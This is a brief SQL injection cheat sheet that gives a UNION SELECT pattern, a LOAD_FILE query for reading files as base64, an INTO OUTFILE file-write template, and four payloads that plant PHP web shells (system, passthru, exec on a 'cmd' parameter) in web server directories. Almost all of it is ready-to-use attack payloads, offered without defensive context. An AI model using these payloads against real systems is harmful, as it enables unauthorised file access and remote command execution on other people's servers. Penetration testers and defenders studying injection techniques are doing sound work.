Miscellaneous Useful Injections
Miscellaneous Useful Injections
General pattern:
'UNION SELECT 1,<insert from the below>,3....-- -
MySQL Version
MySQL User
Read File
Reveal Data Directory
Display File Contents in Base64
SELECT TO_BASE64(LOAD_FILE("C:\\inetpub\\wwwroot\\uploads\\shell.php"))
Create File
'union select ("<text>"),2,3,4,5,6 INTO OUTFILE '<directory>'-- -
Create a Reverse Shell
' UNION SELECT "<?php system($_REQUEST['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php';-- -
' UNION SELECT (<?php system($_REQUEST["cmd"]);) INTO OUTFILE '/var/www/html/shell.php';-- -
' UNION SELECT ("<?php echo passthru($_GET['cmd']);") INTO OUTFILE 'C:/xampp/htdocs/shell.php' -- -
' UNION SELECT (<?php echo exec($_GET["cmd"]);) INTO OUTFILE '/srv/http/shell.php';-- -